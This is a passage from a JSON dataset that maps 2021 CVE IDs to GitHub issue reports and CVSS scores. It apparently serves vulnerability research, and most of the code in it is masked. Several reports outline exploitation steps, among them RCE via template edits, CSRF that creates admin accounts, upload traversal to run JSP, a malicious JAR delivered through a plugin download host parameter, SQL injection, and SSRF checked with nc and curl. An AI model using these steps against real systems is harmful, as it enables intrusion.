        "Issue_Url_new": "https://github.com/arterli/cmswing/issues/56",
        "Repo_new": "arterli/cmswing",
        "Issue_Created_At": "2021-11-14T13:13:32Z",
        "description": "RCE vulnerability in Cmswing NUMBERTAG Find a RCE vulnerability in cmswing project version APITAG can be found in the analysis below. Local Test APITAG the background of the system, select update_channel module\uff0cthen edit it. FILETAG APITAG log rule APITAG or APITAG FILETAG APITAG FILETAG APITAG anything, then save it. We can find that our code is executed FILETAG NUMBERTAG Get IP and open calc. FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43737",
        "Issue_Url_old": "https://github.com/hiliqi/xiaohuanxiong/issues/28",
        "Issue_Url_new": "https://github.com/hiliqi/xiaohuanxiong/issues/28",
        "Repo_new": "hiliqi/xiaohuanxiong",
        "Issue_Created_At": "2021-11-14T14:00:31Z",
        "description": "There is two CSRF vulnerability that can add the administrator account and modify administrator account's password. After the administrator logged in, open the following two page and Click the button, you can use javascript to create a APITAG that is triggered directly poc:one >add new administrator account CODETAG poc:two >modify administrator account's password CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-43745",
        "Issue_Url_old": "https://github.com/zadam/trilium/issues/2340",
        "Issue_Url_new": "https://github.com/zadam/trilium/issues/2340",
        "Repo_new": "zadam/trilium",
        "Issue_Created_At": "2021-11-15T01:40:53Z",
        "description": "Denial of Service. Preflight Checklist X] I have searched the [issue tracker URLTAG for a bug report that matches the one I want to file, without success. Trilium Version NUMBERTAG What operating system are you using? Windows What is your setup? Local (no sync) Operating System Version Windows NUMBERTAG APITAG Expected Behavior PATHTAG APITAG function NUMBERTAG lines: APITAG > APITAG Actual Behavior local sofeware listen NUMBERTAG send URLTAG similar DDOS FILETAG Additional Information _No response_",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-43775",
        "Issue_Url_old": "https://github.com/aimhubio/aim/issues/999",
        "Issue_Url_new": "https://github.com/aimhubio/aim/issues/999",
        "Repo_new": "aimhubio/aim",
        "Issue_Created_At": "2021-11-11T12:25:17Z",
        "description": "Security vulnerabilty. What would be the right contact to report a security vulnerabilty? thanks!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 8.6,
        "impactScore": 4.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43789",
        "Issue_Url_old": "https://github.com/PrestaShop/PrestaShop/issues/26623",
        "Issue_Url_new": "https://github.com/prestashop/prestashop/issues/26623",
        "Repo_new": "prestashop/prestashop",
        "Issue_Created_At": "2021-11-16T09:29:09Z",
        "description": "A. Prerequisites FILETAG X] I have already [searched in existing features request URLTAG and found no previous suggestion of this feature. Is your feature request related to a problem? s Describe the solution you'd like s Alternatives you've considered s Additional context s",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43801",
        "Issue_Url_old": "https://github.com/mercurius-js/mercurius/issues/677",
        "Issue_Url_new": "https://github.com/mercurius-js/mercurius/issues/677",
        "Repo_new": "mercurius-js/mercurius",
        "Issue_Created_At": "2021-12-01T16:53:59Z",
        "description": "Context can be undefined in the error handler. In production it's possible to see: ERRORTAG This can happen if an error is thrown in a hook. We should be adding back the check for Context in the error handler. APITAG posted by MENTIONTAG in URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43802",
        "Issue_Url_old": "https://github.com/ether/etherpad-lite/issues/5010",
        "Issue_Url_new": "https://github.com/ether/etherpad-lite/issues/5010",
        "Repo_new": "ether/etherpad-lite",
        "Issue_Created_At": "2021-04-17T10:06:14Z",
        "description": "Sessionstorage is constantly growing. The session storage seems to be constantly growing When running etherpad we see a constantly growing number of session storage values in the database. Is there a way to clean them up? We already looked into the script, which didn't help. FILETAG . So it seems that this sessions are no group sessions. A standard session storage entry looks like: CODETAG Server (please complete the following information): Etherpad version NUMBERTAG OS: Debian Buster FILETAG version (node version): APITAG npm version (npm version NUMBERTAG Additional context All session storage keys values from mariadb: CODETAG None session storage keys values from mariadb: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-43814",
        "Issue_Url_old": "https://github.com/rizinorg/rizin/issues/2083",
        "Issue_Url_new": "https://github.com/rizinorg/rizin/issues/2083",
        "Repo_new": "rizinorg/rizin",
        "Issue_Created_At": "2021-12-09T15:44:16Z",
        "description": "Heap based OOB write when parsing dwarf die info. Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG amd NUMBERTAG File format of the file you reverse (mandatory) | ELF NUMBERTAG Architecture/bits of the file (mandatory) | amd NUMBERTAG APITAG full output, not truncated (mandatory) | rizin NUMBERTAG git @ linu NUMBERTAG commit: APITAG build NUMBERTAG Expected behavior Analyzing binaries shouldn't trigger an OOB memory write. Actual behavior There is a heap based out of bounds write in APITAG when reversing an amd NUMBERTAG elf binary with dwarf debug info, respectively. Steps to reproduce the behavior Analyze the binary attached below with aaa on an asan build to reproduce the crash. FILETAG Additional Logs, screenshots, source code, configuration dump, ... ERRORTAG The issue seems to be that at APITAG the line APITAG gets executed with APITAG equal to NUMBERTAG so this is equivalent to a APITAG (I think in this case a chunk with the smallest allocatable size is returned, which should be around NUMBERTAG or NUMBERTAG bytes, but in APITAG a die_attribute gets written, which is NUMBERTAG bytes in size). This happens because in APITAG the loop gets run APITAG times, but as APITAG is NUMBERTAG and is of type APITAG this results in an undeflow which then triggers the OOB write.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-43816",
        "Issue_Url_old": "https://github.com/containerd/containerd/issues/6194",
        "Issue_Url_new": "https://github.com/containerd/containerd/issues/6194",
        "Repo_new": "containerd/containerd",
        "Issue_Created_At": "2021-11-02T00:39:45Z",
        "description": "cri + selinux: /etc/hosts from APITAG mount getting relabeled. Description When running rke2/k3s pointing at our bundled (or stock) containerd, one can apply an unprivileged pod that relabels APITAG on the host by mounting a APITAG APITAG volume at the same location in the container: ERRORTAG Steps to reproduce the issue NUMBERTAG Install RKE2 on APITAG NUMBERTAG with APITAG enabled (the default when installed via FILETAG NUMBERTAG Establish that your APITAG is correctly labeled: CODETAG NUMBERTAG Apply this pod spec: ERRORTAG NUMBERTAG Wiat for the pod to spin up then check your APITAG : CODETAG Describe the results you received and expected Expected: APITAG retained APITAG type label with no categories Received: APITAG relabeled to APITAG with category labels specific to the container that bind mounted it What version of containerd are you using NUMBERTAG and NUMBERTAG k3s1) Any other relevant information ERRORTAG First seen while running k8s e2e conformance via sonobuoy against rke NUMBERTAG rc1+rke2r1 (most recently against NUMBERTAG rc1+rke2r1): URLTAG APITAG seen with k3s NUMBERTAG that also ships with containerd NUMBERTAG Show configuration if it is related to CRI plugin. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 6.0,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-43857",
        "Issue_Url_old": "https://github.com/Gerapy/Gerapy/issues/219",
        "Issue_Url_new": "https://github.com/gerapy/gerapy/issues/219",
        "Repo_new": "gerapy/gerapy",
        "Issue_Created_At": "2021-12-02T12:51:31Z",
        "description": "Gerapy NUMBERTAG project_configure function exist remote code execute !!!. Hi, your project find a vulnerability source location: URLTAG POC\uff1a POST PATHTAG HTTP NUMBERTAG Host: x.x.x.x User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept: application/json, text/plain, / Authorization: Token $token Content Type: application/x www form urlencoded Content Length NUMBERTAG spider\": \" APITAG | APITAG \"} FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-43862",
        "Issue_Url_old": "https://github.com/jcubic/jquery.terminal/issues/727",
        "Issue_Url_new": "https://github.com/jcubic/jquery.terminal/issues/727",
        "Repo_new": "jcubic/jquery.terminal",
        "Issue_Created_At": "2021-12-28T20:03:48Z",
        "description": "Self XSS. Self XSS is possible by typing something like \"onclick=\"alert NUMBERTAG I think it's because data text doesn't contain sanitized characters. Don't think it's critical but there you go regardless :)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-44093",
        "Issue_Url_old": "https://github.com/94fzb/zrlog/issues/115",
        "Issue_Url_new": "https://github.com/94fzb/zrlog/issues/115",
        "Repo_new": "94fzb/zrlog",
        "Issue_Created_At": "2021-11-16T07:45:28Z",
        "description": "APITAG NUMBERTAG Remote command execution vulnerability. there is a remote command execution vulnerability at the upload avatar function on the background. APITAG upload pictures, then intercept data package, like this FILETAG then modify the file name to jsp , you can bypass the limit that cannot be uploaded by JSP files. FILETAG although JSP files have been uploaded, because of the existence of global interceptors, we cannot execute commands. it would return NUMBERTAG APITAG however, through my research, I found that the upload directory can be traversed. just modify the parameter dir , like this FILETAG then the file will be saved to the corresponding directory. APITAG access this file, successfully execute system command APITAG Code analysis. at APITAG APITAG APITAG CODETAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44094",
        "Issue_Url_old": "https://github.com/94fzb/zrlog/issues/116",
        "Issue_Url_new": "https://github.com/94fzb/zrlog/issues/116",
        "Repo_new": "94fzb/zrlog",
        "Issue_Created_At": "2021-11-16T11:45:07Z",
        "description": "APITAG NUMBERTAG has a remote command execution vulnerability at plugin download function. Just download a plugin and intercept your data package. APITAG data package like this APITAG modify the JAR just downloaded, join the malicious code in the startup class. APITAG then modify the parameter host to the malicious JAR file download address APITAG after download, malicious code will be executed APITAG Download Record APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-44095",
        "Issue_Url_old": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/1",
        "Issue_Url_new": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/1",
        "Repo_new": "projectworldsofficial/hospital-management-system-in-php",
        "Issue_Created_At": "2021-09-27T17:15:07Z",
        "description": "Vulnerability/BUG SQL Injection on login page.. Hi I found a SQL injection vulnerability in you hospital management system. Loign page request APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Above query will only sleep database for NUMBERTAG second but Using APITAG bad user can dump the database as show in image. FILETAG Control User inputs consumed by the application should be sanitized based on the data type and data sets. For example, user input for age should only be allowed to contain numbers. Blacklist approach where certains characters and keywords are sanitized is not recommended. Remediation To prevent this follow the following steps: a) Validate all input data against a whitelist b) Use of parameterized queries String APITAG = \"SELECT FROM User WHERE APITAG = ? \"; APITAG APITAG = APITAG APITAG APITAG APITAG rs = APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44096",
        "Issue_Url_old": "https://github.com/EGavilan-Media/User-Registration-and-Login-System-With-Admin-Panel/issues/2",
        "Issue_Url_new": "https://github.com/egavilan-media/user-registration-and-login-system-with-admin-panel/issues/2",
        "Repo_new": "egavilan-media/user-registration-and-login-system-with-admin-panel",
        "Issue_Created_At": "2021-09-28T18:02:52Z",
        "description": "Vulnerability/BUG SQL Injection on \"profile_action update_user\". Hi I found a SQL injection vulnerability User Registration and Login System With Admin Panel APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Above query will only sleep database for NUMBERTAG second but Using APITAG bad user can dump the database as show in image. FILETAG Control User inputs consumed by the application should be sanitized based on the data type and data sets. For example, user input for age should only be allowed to contain numbers. Blacklist approach where certains characters and keywords are sanitized is not recommended. Remediation To prevent this follow the following steps: a) Validate all input data against a whitelist b) Use of parameterized queries String APITAG = \"SELECT FROM User WHERE APITAG = ? \"; APITAG APITAG = APITAG APITAG APITAG APITAG rs = APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44097",
        "Issue_Url_old": "https://github.com/EGavilan-Media/Contact-Form-With-Messages-Entry-Management/issues/1",
        "Issue_Url_new": "https://github.com/egavilan-media/contact-form-with-messages-entry-management/issues/1",
        "Repo_new": "egavilan-media/contact-form-with-messages-entry-management",
        "Issue_Created_At": "2021-09-30T08:45:03Z",
        "description": "Vulnerability/BUG SQL Injection while APITAG Hi I found a SQL injection vulnerability in your Contact Form With Messages Entry Management APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Above query will only sleep database for NUMBERTAG second but Using APITAG bad user can dump the database as show in image. FILETAG Control User inputs consumed by the application should be sanitized based on the data type and data sets. For example, user input for age should only be allowed to contain numbers. Blacklist approach where certains characters and keywords are sanitized is not recommended. Remediation To prevent this follow the following steps: a) Validate all input data against a whitelist b) Use of parameterized queries String APITAG = \"SELECT FROM User WHERE APITAG = ? \"; APITAG APITAG = APITAG APITAG APITAG APITAG rs = APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44098",
        "Issue_Url_old": "https://github.com/EGavilan-Media/Expense-Management-System/issues/1",
        "Issue_Url_new": "https://github.com/egavilan-media/expense-management-system/issues/1",
        "Repo_new": "egavilan-media/expense-management-system",
        "Issue_Created_At": "2021-09-30T09:22:03Z",
        "description": "Vulnerability/BUG SQL Injection while updating details.. Hi I found a SQL injection vulnerability in your Expense Management System APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Above query will only sleep database for NUMBERTAG second but Using APITAG bad user can dump the database as show in image. FILETAG Control User inputs consumed by the application should be sanitized based on the data type and data sets. For example, user input for age should only be allowed to contain numbers. Blacklist approach where certains characters and keywords are sanitized is not recommended. Remediation To prevent this follow the following steps: a) Validate all input data against a whitelist b) Use of parameterized queries String APITAG = \"SELECT FROM User WHERE APITAG = ? \"; APITAG APITAG = APITAG APITAG APITAG APITAG rs = APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44108",
        "Issue_Url_old": "https://github.com/open5gs/open5gs/issues/1247",
        "Issue_Url_new": "https://github.com/open5gs/open5gs/issues/1247",
        "Repo_new": "open5gs/open5gs",
        "Issue_Created_At": "2021-11-16T13:10:08Z",
        "description": "memory corruption and null pointer dereference. Thanks for the great project first. I have found some vulnerabilities during reading the source code. memory corruption in APITAG when nf receive sbi(http2) message with APITAG , APITAG in APITAG will try to parse all parts in the request, but the struct APITAG only have APITAG which is NUMBERTAG member, and this will cause a memory corruption to stack memory. below is a poc requests to crash the amfd(which listen on APITAG ERRORTAG null pointer dereference APITAG in amf will call APITAG in APITAG APITAG can parse a data without n2_info_container and return APITAG as null. This will skip the if on line NUMBERTAG ERRORTAG this case will not set APITAG , but on line NUMBERTAG APITAG is being dereferenced APITAG below is a poc crash amfd(this requires a live ue context, i was using ueransim to simulate a imsi NUMBERTAG here): CODETAG leommxj from Chaitin Security Research Lab.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44111",
        "Issue_Url_old": "https://github.com/s-cart/s-cart/issues/102",
        "Issue_Url_new": "https://github.com/s-cart/s-cart/issues/102",
        "Repo_new": "s-cart/s-cart",
        "Issue_Created_At": "2021-11-17T08:46:35Z",
        "description": "A bug that leads to Arbitrary file download. Describe the bug cod in PATHTAG CODETAG without any filter,can Splicing the path. poc: APITAG To Reproduce Steps to reproduce the behavior NUMBERTAG login in as admin NUMBERTAG isit the PATHTAG NUMBERTAG the file will be downloaded Screenshots FILETAG version newest NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.4,
        "impactScore": 3.6,
        "exploitabilityScore": 0.8
    },
    {
        "CVE_ID": "CVE-2021-44138",
        "Issue_Url_old": "https://github.com/maybe-why-not/reponame/issues/2",
        "Issue_Url_new": "https://github.com/maybe-why-not/reponame/issues/2",
        "Repo_new": "maybe-why-not/reponame",
        "Issue_Created_At": "2022-04-04T11:09:53Z",
        "description": "Directory traversal vulnerability in Caucho Resin. Directory traversal vulnerability in Caucho Resin, as distributed in Resin NUMBERTAG APITAG allows remote attackers to read files in arbitrary directories via a ; in a pathname within an HTTP request. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44139",
        "Issue_Url_old": "https://github.com/alibaba/Sentinel/issues/2451",
        "Issue_Url_new": "https://github.com/alibaba/sentinel/issues/2451",
        "Repo_new": "alibaba/sentinel",
        "Issue_Created_At": "2021-11-18T05:38:15Z",
        "description": "Report a Sentinel Security Vulnerability about SSRF. \u4f60\u597d\uff0c\u6211\u662fthreedr3am of APITAG Security APITAG APITAG Issue Description Type: bug report \u7531\u4e8e\u8be5\u5f00\u6e90\u9879\u76ee\u7684sentinel dashboard PATHTAG APITAG APITAG APITAG APITAG dashboard\u53d1\u8d77\u4efb\u610fGET\u8bf7\u6c42\u3002 ERRORTAG NUMBERTAG APITAG ERRORTAG Describe what happened (or what feature you want) APITAG GET\u8bf7\u6c42\u7684SSRF\u653b\u51fb\u3002 APITAG Describe what you expected to happen SSRF How to reproduce it (as minimally and precisely as possible NUMBERTAG github\u62c9\u53d6\u5f00\u6e90\u4ee3\u7801 URLTAG NUMBERTAG PATHTAG NUMBERTAG nc lvvp NUMBERTAG localhost NUMBERTAG SSRF GET\u653b\u51fb\uff0ccurl XGET ' URLTAG \u53ef\u4ee5\u770b\u5230\uff0cnc\u76d1\u542c\u5230\u4e86GET\u8bf7\u6c42 CODETAG Tell us your environment Anything else we need to know?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44144",
        "Issue_Url_old": "https://github.com/CroatiaControlLtd/asterix/issues/183",
        "Issue_Url_new": "https://github.com/croatiacontrolltd/asterix/issues/183",
        "Repo_new": "croatiacontrolltd/asterix",
        "Issue_Created_At": "2021-05-21T21:15:06Z",
        "description": "\ud83d\udea8 Potential Heap based Buffer Overflow. \ud83d\udc4b Hello, MENTIONTAG MENTIONTAG MENTIONTAG a potential medium severity Heap based Buffer Overflow vulnerability in your repository has been disclosed to us. Next Steps NUMBERTAG isit URLTAG for more advisory information NUMBERTAG FILETAG to validate or speak to the researcher for more assistance NUMBERTAG Propose a patch or outsource it to our community whoever fixes it gets paid. Confused or need more help? Join us on our Discord URLTAG and a member of our team will be happy to help! \ud83e\udd17 Speak to a member of our team: MENTIONTAG This issue was automatically generated by FILETAG a bug bounty board for securing open source code.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44150",
        "Issue_Url_old": "https://github.com/tusdotnet/tusdotnet/issues/157",
        "Issue_Url_new": "https://github.com/tusdotnet/tusdotnet/issues/157",
        "Repo_new": "tusdotnet/tusdotnet",
        "Issue_Created_At": "2021-11-22T11:42:09Z",
        "description": "Tus client uses a deprecated cryptographic function to calculate the file checksums. SHA NUMBERTAG is not collision resistant, which makes it easier for context dependent attackers to conduct tampering attacks and alter the checksum which makes it possible to alter the file being uploaded itself. For a long time, it has been possible \"to find collisions for SHA1 and that thus it is not secure to use for digital signatures, file integrity, and file identification purposes\". see: URLTAG Also: URLTAG CVETAG Finding: FILETAG URLTAG URLTAG URLTAG FILETAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44219",
        "Issue_Url_old": "https://github.com/flipped-aurora/gin-vue-admin/issues/813",
        "Issue_Url_new": "https://github.com/flipped-aurora/gin-vue-admin/issues/813",
        "Repo_new": "flipped-aurora/gin-vue-admin",
        "Issue_Created_At": "2021-11-23T08:05:36Z",
        "description": "APITAG Security Issues. gin vue admin NUMBERTAG Node \u7248\u672c APITAG Golang \u7248\u672c go NUMBERTAG bug\u63cf\u8ff0 \u53d1\u73b0\u4e86\u4e00\u4e2a\u5b89\u5168\u6f0f\u6d1e\uff0c\u5df2\u7ecf\u901a\u8fc7\u90ae\u7bb1\u8054\u7cfb\u4f60\u3002 \u4fee\u6539\u5efa\u8bae \u5f88\u597d\u4fee\u590d",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44238",
        "Issue_Url_old": "https://github.com/loadream/AyaCMS/issues/2",
        "Issue_Url_new": "https://github.com/loadream/ayacms/issues/2",
        "Repo_new": "loadream/ayacms",
        "Issue_Created_At": "2021-11-22T03:02:39Z",
        "description": "APITAG NUMBERTAG has RCE vulnerability. vulnerability in PATHTAG Through code audit, it is found that the value of $code comes from the transfer parameters of form data. FILETAG Then through file_put ($file, $code) writes the passed parameters to the file. FILETAG The whole process does not filter the passed parameter $code, resulting in code execution. Reappearance NUMBERTAG login the admin and click the edit button FILETAG APITAG your malicious code FILETAG APITAG edited file is saved in PATHTAG access it. result FILETAG :",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-44255",
        "Issue_Url_old": "https://github.com/ccrisan/motioneyeos/issues/2843",
        "Issue_Url_new": "https://github.com/motioneye-project/motioneyeos/issues/2843",
        "Repo_new": "motioneye-project/motioneyeos",
        "Issue_Created_At": "2021-11-21T15:35:01Z",
        "description": "Lack of admin password leaves many publicly availble system vulnerable to RCE . As with many web based apps, the admin user can run arbitrary code on the underlying system via the web gui. While that may or may not be a security issue, and for meye use cases it probably isn\u2019t, I feel that the lack of password on the admin account has left many publicly available systems open to exploitation. I\u2019d suggest a feature to implement a random password on initial installation. Off hand, I don\u2019t really know how that would look. I may be able to implement something if I find time. Here is a link to my post about the code execution: URLTAG Long story short an admin can run arbitrary code via the option to run commands when motion is detected (obviously). Additionally, an admin can upload a backup that contains a malicious APITAG file that will execute arbitrary code.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-44269",
        "Issue_Url_old": "https://github.com/dbry/WavPack/issues/110",
        "Issue_Url_new": "https://github.com/dbry/wavpack/issues/110",
        "Repo_new": "dbry/wavpack",
        "Issue_Created_At": "2021-11-23T17:17:36Z",
        "description": "A heap Out of bounds Read in APITAG (src/pack_utils.c). Hi, I have found a heap out of bounds read bug in function APITAG base on the commit APITAG code that caused crash shows below: APITAG CODETAG Crash file: FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-44273",
        "Issue_Url_old": "https://github.com/e2guardian/e2guardian/issues/707",
        "Issue_Url_new": "https://github.com/e2guardian/e2guardian/issues/707",
        "Repo_new": "e2guardian/e2guardian",
        "Issue_Created_At": "2021-11-20T21:40:29Z",
        "description": "NUMBERTAG Missing SSL hostname check. I tried e2guardian in a virtual machine today, running it as a standalone transparent proxy with SSL MITM, with the following iptables rules that redirect traffic to it (where NUMBERTAG is the uid of the user that e2guardian runs as): CODETAG I found that e2guardian enables browser connections to sites that it should not allow. One example is FILETAG This is very serious, because anyone on the path, who can intercept the connection or poison the DNS cache and thus redirect e2guardian's outgoing connection to a host under his control, now can perform a successful MITM attack. All he needs is any valid certificate e2guardian will accept it for any host. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.4,
        "impactScore": 5.2,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-44299",
        "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/29",
        "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/29",
        "Repo_new": "navigatecms/navigate-cms",
        "Issue_Created_At": "2021-11-25T17:38:20Z",
        "description": "Reflected XSS attack in PATHTAG with the theme parameter in APITAG NUMBERTAG EXPECTED BEHAVIOUR An authenticated malicious user can take advantage of a Reflected XSS vulnerability in the themes feature. exp APITAG FILETAG analysis PATHTAG line NUMBERTAG without any filter. CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-44334",
        "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/12",
        "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/12",
        "Repo_new": "brackeen/ok-file-formats",
        "Issue_Created_At": "2021-03-26T08:44:18Z",
        "description": "heap buffer overflow in APITAG at APITAG Version dev version, git clone FILETAG Environment Ubuntu NUMBERTAG bit Testcase CODETAG Command Compile test program: APITAG Compile test program with address sanitizer with this command: APITAG Result The result of running without ASAN: APITAG Information obtained by using ASAN: ERRORTAG Description A heap buffer overflow was discovered in ok_file_formats. The issue is being triggered in function APITAG at APITAG Poc Poc file is FILETAG .",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-44335",
        "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/17",
        "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/17",
        "Repo_new": "brackeen/ok-file-formats",
        "Issue_Created_At": "2021-06-07T05:03:03Z",
